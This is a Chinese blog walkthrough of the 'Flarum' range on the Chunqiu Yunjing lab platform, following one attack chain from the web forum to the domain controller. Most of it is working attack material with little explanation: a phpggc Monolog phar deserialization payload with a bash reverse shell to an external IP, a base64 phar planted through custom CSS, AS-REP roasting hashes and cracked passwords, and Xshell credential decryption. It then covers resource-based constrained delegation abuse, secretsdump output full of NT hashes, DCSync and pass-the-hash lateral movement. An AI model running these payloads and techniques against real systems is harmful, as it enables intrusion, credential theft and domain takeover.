当前位置: 首页 > news >正文

春秋云镜 Flarum

news 2025/8/25 6:46:30

信息收集

[09:47:00] 200 -    2KB - /tags[09:47:16] 200 -    1KB - /web.config[09:45:21] 200 -    2KB - /all[09:45:21] 404 -   48B  - /api-doc[09:45:21] 404 -   48B  - /api/__swagger__/[09:45:21] 404 -   48B  - /api/2/explore/[09:45:21] 404 -   48B  - /api/api[09:45:21] 404 -   48B  - /api.php[09:45:21] 404 -   48B  - /api-docs[09:45:21] 404 -   48B  - /api.log[09:45:21] 404 -   48B  - /api.py[09:45:21] 404 -   48B  - /api.json[09:45:21] 404 -   48B  - /api/_swagger_/[09:45:21] 404 -   48B  - /api/2/issue/createmeta[09:45:21] 404 -   48B  - /api/api-docs[09:45:21] 200 -    2KB - /api/[09:45:21] 404 -   48B  - /api/apidocs/swagger.json[09:45:21] 404 -   48B  - /api/apidocs[09:45:21] 200 -    2KB - /api[09:45:24] 301 -  313B  - /assets  ->  http://39.99.246.81/assets/[09:45:24] 403 -  277B  - /assets/[09:45:55] 401 -    2KB - /flags[09:46:13] 405 -    2KB - /login[09:46:14] 302 -    0B  - /logout  ->  http://39.99.246.81[09:46:40] 405 -    2KB - /register[09:46:41] 405 -    2KB - /reset[09:46:45] 403 -  277B  - /server-status[09:46:45] 403 -  277B  - /server-status/[09:46:47] 401 -    2KB - /settings

使用rockyou爆破出来密码,然后进入后台搜索相关漏洞,存在phar反序列化

跳板机权限

php -d phar.readonly=0 phpggc -p tar -b Monolog/RCE6 system "bash -c 'bash -i >& /dev/tcp/123.249.0.46/8080 0>&1'"
自定义css样式@import (inline) 'data:text/css;base64,dGVzdC50eHQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAwMDA2NjQAAAAAAAAAAAAAAAAAAAAAADAwMDAwMDAwMDA0ADAwMDAwMDAwMDAwADAwMDYyMjEgMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB1c3RhcgAwMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB0ZXN0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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yOyvc3SUEqlIjzSLAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=';​.test {content: data-uri("phar://./assets/forum.css");}

然后上传msf后门,利用 提权模块探测

run post/multi/manage/autorouterun autoroute -pmulti/recon/local_exploit_suggester

利用openssl的能力错误配置读flag

LFILE=file_to_readopenssl enc -in "$LFILE"

内网信息收集

[2025-07-15 11:27:22] [SUCCESS] 端口开放 172.22.60.52:80[2025-07-15 11:27:22] [SUCCESS] 端口开放 172.22.60.52:22[2025-07-15 11:27:22] [SUCCESS] 端口开放 172.22.60.15:445[2025-07-15 11:27:22] [SUCCESS] 端口开放 172.22.60.42:445[2025-07-15 11:27:22] [SUCCESS] 端口开放 172.22.60.8:445[2025-07-15 11:27:22] [SUCCESS] 端口开放 172.22.60.8:389[2025-07-15 11:27:22] [SUCCESS] 端口开放 172.22.60.15:139[2025-07-15 11:27:22] [SUCCESS] 端口开放 172.22.60.42:139[2025-07-15 11:27:22] [SUCCESS] 端口开放 172.22.60.8:139[2025-07-15 11:27:22] [SUCCESS] 端口开放 172.22.60.15:135[2025-07-15 11:27:22] [SUCCESS] 端口开放 172.22.60.42:135[2025-07-15 11:27:22] [SUCCESS] 端口开放 172.22.60.8:135[2025-07-15 11:27:22] [SUCCESS] 端口开放 172.22.60.8:88[2025-07-15 11:27:22] [SUCCESS] 服务识别 172.22.60.52:22 => [ssh] 版本:8.9p1 Ubuntu 3ubuntu0.3 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.3.][2025-07-15 11:27:23] [SUCCESS] 端口开放 172.22.60.52:8080[2025-07-15 11:27:27] [SUCCESS] 服务识别 172.22.60.15:445 => [2025-07-15 11:27:27] [SUCCESS] 服务识别 172.22.60.42:445 => [2025-07-15 11:27:28] [SUCCESS] 服务识别 172.22.60.8:445 => [2025-07-15 11:27:28] [SUCCESS] 服务识别 172.22.60.8:389 => [2025-07-15 11:27:28] [SUCCESS] 服务识别 172.22.60.15:139 =>  Banner:[.][2025-07-15 11:27:28] [SUCCESS] 服务识别 172.22.60.42:139 =>  Banner:[.][2025-07-15 11:27:28] [SUCCESS] 服务识别 172.22.60.8:139 =>  Banner:[.][2025-07-15 11:27:28] [SUCCESS] 服务识别 172.22.60.52:80 => [http][2025-07-15 11:27:28] [SUCCESS] 服务识别 172.22.60.8:88 => [2025-07-15 11:27:28] [SUCCESS] 服务识别 172.22.60.52:8080 => [2025-07-15 11:28:28] [SUCCESS] 服务识别 172.22.60.15:135 => [2025-07-15 11:28:28] [SUCCESS] 服务识别 172.22.60.42:135 => [2025-07-15 11:28:28] [SUCCESS] 服务识别 172.22.60.8:135 => [2025-07-15 11:28:28] [INFO] 存活端口数量: 14[2025-07-15 11:28:28] [INFO] 开始漏洞扫描[2025-07-15 11:28:28] [INFO] 加载的插件: findnet, ldap, ms17010, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle[2025-07-15 11:28:28] [SUCCESS] NetInfo 扫描结果目标主机: 172.22.60.8主机名: DC发现的网络接口:IPv4地址:└─ 172.22.60.8└─ 169.254.192.192[2025-07-15 11:28:28] [SUCCESS] NetInfo 扫描结果目标主机: 172.22.60.15主机名: PC1发现的网络接口:IPv4地址:└─ 172.22.60.15└─ 169.254.126.238[2025-07-15 11:28:28] [SUCCESS] NetInfo 扫描结果目标主机: 172.22.60.42主机名: Fileserver发现的网络接口:IPv4地址:└─ 172.22.60.42└─ 169.254.186.35[2025-07-15 11:28:28] [SUCCESS] NetBios 172.22.60.42    XIAORANG\FILESERVER           [2025-07-15 11:28:28] [SUCCESS] NetBios 172.22.60.15    XIAORANG\PC1                  [2025-07-15 11:28:28] [SUCCESS] NetBios 172.22.60.8     DC:XIAORANG\DC​​

发现config.php,拿到数据库密码,然后导出user表

mysql -u root -p -D your_database -s -N -e "SELECT email FROM flarum_users;"

说是要kerberos攻击,GetNPUsers查找不需要Kerberos预身份验证的用户

proxychains4 python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py xiaorang.lab/ -dc-ip 172.22.60.8 -usersfile user.txt

发现两组

$krb5asrep$23$wangyun@xiaorang.lab@XIAORANG.LAB:33db140a7c184229afbcbc1bc528e15f$8b19657dbf1168e8d7cf69a340f0c852fadfbb736b579e7b6d90fc342259cab9824263d9e67bdb285988b6484105d05c842eb5975071f5b64d206b921e823ca57411779b43776e233d3ef88b51ce9efad0bd34105c5c4a18a57577d924ec673c0c393f16ab51bbd95640e01f3d32ad5279bf02fbb3b6220d352764a97137b98375f4b3cfe14858a633f971e13f0d67ddf0d22e2d69dbd82967eec2cab111d91a9c5ff0d49b1a8a19e614a3ed689e0227f3318d60ed1a87710f7974b261e9d7455baaa03dc485a54c1537ced3d2f4e54e0c630752df8d2b0a00408e488afe697f0f8d10b51e2a6a0cd058c1fa$krb5asrep$23$zhangxin@xiaorang.lab@XIAORANG.LAB:0b48d5cf8a726156024e197bd88c3309$d49d189b7dac0c95d02ef6dcb808a225fd6ef877c6aea1899968577a04fff2ef3ac70f8252f878e8968c81f67538b0590b749e06dd93d71be4f5653402fb541ca8bde09773d3e3ae523653b0b338eff08131fa06bfc3d345ab5963a9967092a8e60c2fed0e959ff1b42aa7ac5d95a1dbc5f10ef81c3740a49267a496abffa2a9f554a3954ae75e7242206d431b30742bcf7d58007287591d2180e93c47a1b6a96dbb3dd8ed7d790bba7c7a21a690b7e55dd83c3841795d801ddec552935049b8a23a5ebc29dca8485be41136415f3221641122110df16844af95fe1dc2bcaf9002e61e289f375abb1e979348

爆破密码

hashcat -m 18200 -a 0 baopo.txt /usr/share/wordlists/rockyou.txt
$krb5asrep$23$wangyun@xiaorang.lab@XIAORANG.LAB:33db140a7c184229afbcbc1bc528e15f$8b19657dbf1168e8d7cf69a340f0c852fadfbb736b579e7b6d90fc342259cab9824263d9e67bdb285988b6484105d05c842eb5975071f5b64d206b921e823ca57411779b43776e233d3ef88b51ce9efad0bd34105c5c4a18a57577d924ec673c0c393f16ab51bbd95640e01f3d32ad5279bf02fbb3b6220d352764a97137b98375f4b3cfe14858a633f971e13f0d67ddf0d22e2d69dbd82967eec2cab111d91a9c5ff0d49b1a8a19e614a3ed689e0227f3318d60ed1a87710f7974b261e9d7455baaa03dc485a54c1537ced3d2f4e54e0c630752df8d2b0a00408e488afe697f0f8d10b51e2a6a0cd058c1fa:Adm12geC

成功爆破,然后用BloodHound查看域内,发现zhangxin用户属于用户组,对于机器有generic权限,然后机器对于XIAORANG.LAB有DCSync权限,可以dump域内所i有哈希

rdp登录

wangyun@xiaorang/Adm12geC

SharpXDecrypt解密

然后发现xshell7使用SharpXDecrypt解密

Xshell全版本凭证一键导出工具!(支持Xshell 7.0+版本)Author: 0pen1Github: https://github.com/JDArmy[!] WARNING: For learning purposes only,please delete it within 24 hours after downloading!​[*] Start GetUserPath....UserPath: C:\Users\wangyun\Documents\NetSarang Computer\7[*] Get UserPath Success !​[*] Start GetUserSID....Username: wangyunuserSID: S-1-5-21-3535393121-624993632-895678587-1107[*] GetUserSID Success !​XSHPath: C:\Users\wangyun\Documents\NetSarang Computer\7\Xshell\Sessions\SSH.xshHost: 172.22.60.45UserName: zhangxinPassword: admin4qwY38ccVersion: 7.1

然后使用zhangxin用户登录,使用Acount Operators拿到域控权限

Acount Operators横向

先查询Acount Operators账户

adfind.exe -h 172.22.60.42:389 -s subtree -b CN="Account Operators",CN=Builtin,DC=xiaorang,DC=com member

然后新建机器用户

powershellSet-ExecutionPolicy Bypass -Scope Processimport-module .\Powermad.ps1New-MachineAccount -MachineAccount test3 -Password $(ConvertTo-SecureString "123456" -AsPlainText -Force)
然后设置委派先查sidGet-NetComputer test1 -Properties objectsidtest3 sid:S-1-5-21-1400638014-602433399-2258725660-1152

修改FileServer的修改msds-allowedtoactonbehalfofotheridentity的值

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3535393121-624993632-895678587-1116)"$SDBytes = New-Object byte[] ($SD.BinaryLength)$SD.GetBinaryForm($SDBytes, 0)Get-DomainComputer FILESERVER| Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose

接下来就到了申请ST的步骤了,不过在申请之前,我们需要先配置下映射关系

vim /etc/hosts

而后申请ST

proxychains python3 getST.py -dc-ip 172.22.60.8 "xiaorang.lab/test3$:123456" -spn cifs/FILESERVER.xiaorang.lab -impersonate administrator

导入,而后无密码登录即可

export KRB5CCNAME=administrator@cifs_FILESERVER.xiaorang.lab@XIAORANG.LAB.ccacheproxychains python3 smbexec.py -no-pass -k FILESERVER.xiaorang.lab

整体过程也可以借助Impacket套件实现

proxychains python3 addcomputer.py xiaorang.lab/zhangxin:'admin4qwY38cc' -dc-ip 172.22.60.8 -dc-host xiaorang.lab -computer-name 'TEST2$' -computer-pass 'P@ssw0rd'​proxychains python3 rbcd.py xiaorang.lab/zhangxin:'admin4qwY38cc' -dc-ip 172.22.60.8 -action write -delegate-to 'Fileserver$' -delegate-from 'TEST2$'​proxychains python3 getST.py xiaorang.lab/'TEST2$':'P@ssw0rd' -spn cifs/Fileserver.xiaorang.lab -impersonate Administrator -dc-ip 172.22.60.8

获取主机权限后,抓一下FILESERVER的哈希

proxychains secretsdump.py -k -no-pass FILESERVER.xiaorang.lab -dc-ip 172.22.60.8

具体如下

proxychains secretsdump.py -k -no-pass FILESERVER.xiaorang.lab -dc-ip 172.22.60.8[proxychains] config file found: /etc/proxychains.conf[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4[proxychains] DLL init: proxychains-ng 4.16Impacket for Exegol - v0.10.1.dev1 - Copyright 2022 Fortra - forked by ThePorgs​[proxychains] Strict chain  ...  119.3.215.198:7001  ...  172.22.60.42:445  ...  OK[*] Service RemoteRegistry is in stopped state[*] Starting service RemoteRegistry[*] Target system bootKey: 0xef418f88c0327e5815e32083619efdf5[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)Administrator:500:aad3b435b51404eeaad3b435b51404ee:bd8e2e150f44ea79fff5034cad4539fc:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:b40dda6fd91a2212d118d83e94b61b11:::[*] Dumping cached domain logon information (domain/username:hash)XIAORANG.LAB/Administrator:$DCC2$10240#Administrator#f9224930044d24598d509aeb1a015766: (2023-08-02 07:52:21)[*] Dumping LSA Secrets[*] $MACHINE.ACC XIAORANG\Fileserver$:plain_password_hex:3000310078005b003b0049004e003500450067003e00300039003f0074006c00630024003500450023002800220076003c004b0057005e0063006b005100580024007300620053002e0038002c0060003e00420021007200230030003700470051007200640054004e0078006000510070003300310074006d006b004c002e002f0059003b003f0059002a005d002900640040005b0071007a0070005d004000730066006f003b0042002300210022007400670045006d0023002a002800330073002c00320063004400720032002f003d0078006a002700550066006e002f003a002a0077006f0078002e0066003300XIAORANG\Fileserver$:aad3b435b51404eeaad3b435b51404ee:951d8a9265dfb652f42e5c8c497d70dc:::[*] DPAPI_SYSTEM dpapi_machinekey:0x15367c548c55ac098c599b20b71d1c86a2c1f610dpapi_userkey:0x28a7796c724094930fc4a3c5a099d0b89dccd6d1[*] NL$KM 0000   8B 14 51 59 D7 67 45 80  9F 4A 54 4C 0D E1 D3 29   ..QY.gE..JTL...)0010   3E B6 CC 22 FF B7 C5 74  7F E4 B0 AD E7 FA 90 0D   >.."...t........0020   1B 77 20 D5 A6 67 31 E9  9E 38 DD 95 B0 60 32 C4   .w ..g1..8...`2.0030   BE 8E 72 4D 0D 90 01 7F  01 30 AC D7 F8 4C 2B 4A   ..rM.....0...L+JNL$KM:8b145159d76745809f4a544c0de1d3293eb6cc22ffb7c5747fe4b0ade7fa900d1b7720d5a66731e99e38dd95b06032c4be8e724d0d90017f0130acd7f84c2b4a[*] Cleaning up... [*] Stopping service RemoteRegistry

获取FILESERVER$用户哈希为951d8a9265dfb652f42e5c8c497d70dc,接下来凭借机器用户哈希去获取域控哈希

DcSync攻击

借助secretsdump.py工具导出域控哈希

proxychains secretsdump.py xiaorang.lab/'Fileserver$':@172.22.60.8 -hashes ':951d8a9265dfb652f42e5c8c497d70dc' -just-dc-user Administrator

获取域控哈希c3cfdc08527ec4ab6aa3e630e79d349b

横向移动

借助wmiexec.py工具横向

proxychains python3 wmiexec.py -hashes :c3cfdc08527ec4ab6aa3e630e79d349b Administrator@172.22.60.15 -codec gbk

拿下域控

http://www.dtcms.com/a/348420.html

相关文章:

  • UCIE Specification详解(二)
  • Linux学习-TCP网络协议
  • 基于springboot的高校后勤保修服务系统/基于android的高校后勤保修服务系统app
  • openFeign用的什么协议,dubbo用的什么协议
  • 【重学MySQL】八十七. 触发器管理全攻略:SHOW TRIGGERS与DROP TRIGGER实战详解
  • k8s下的网络通信之calico与调度
  • MySQL官方C/C++ 接口入门
  • 从栈到堆:深入理解C语言静态与动态链表的创建与管理
  • 利旧小天才儿童电话手表实现“一键寻车”功能
  • 线程整理文档
  • 使用UE5开发《红色警戒3》类战略养成游戏的硬件配置指南
  • 【Spring Cloud 微服务】3.智能路由器——深入理解与配置负载均衡
  • MySQL的更新语句执行过程涉及了哪些文件的写入,衍生了redo、undo、二进制日志在什么时候进行写入
  • 从 JUnit 深入理解 Java 注解与反射机制
  • HarmonyOS NEXT系列之元服务框架ASCF
  • 波兰密码破译机bomba:二战密码战的隐形功臣
  • 深入OpenHarmony OTA硬核升级
  • ComfyUI ZLUDA AMD conda 使用遇到的问题
  • stm32温控大棚测控系统(CO2+温湿度+光照)+仿真
  • Docker 容器(一)
  • 【ansible】5.在受管主机部署文件和Jinja2模板
  • 信誉代币的发行和管理机制是怎样的?
  • 基于角色的访问控制(RBAC)研究与Go语言实现
  • overleaf关于给参考文献添加DOI链接的问题
  • B站视频字幕提取工具
  • 当GitHub“断网”:从应急到终极方案,手把手搭建永不宕机的代码协作体系
  • 鸿蒙 ArkTS 开发:Number、Boolean、String 三种核心基本数据类型详解(附实战案例)
  • 从 Unity UGUI 到 Unreal UMG 的无缝迁移:UMG 基础与 UI 控件布局
  • Java的数字计算
  • pycharm的matplotlib不显示动图问题的解决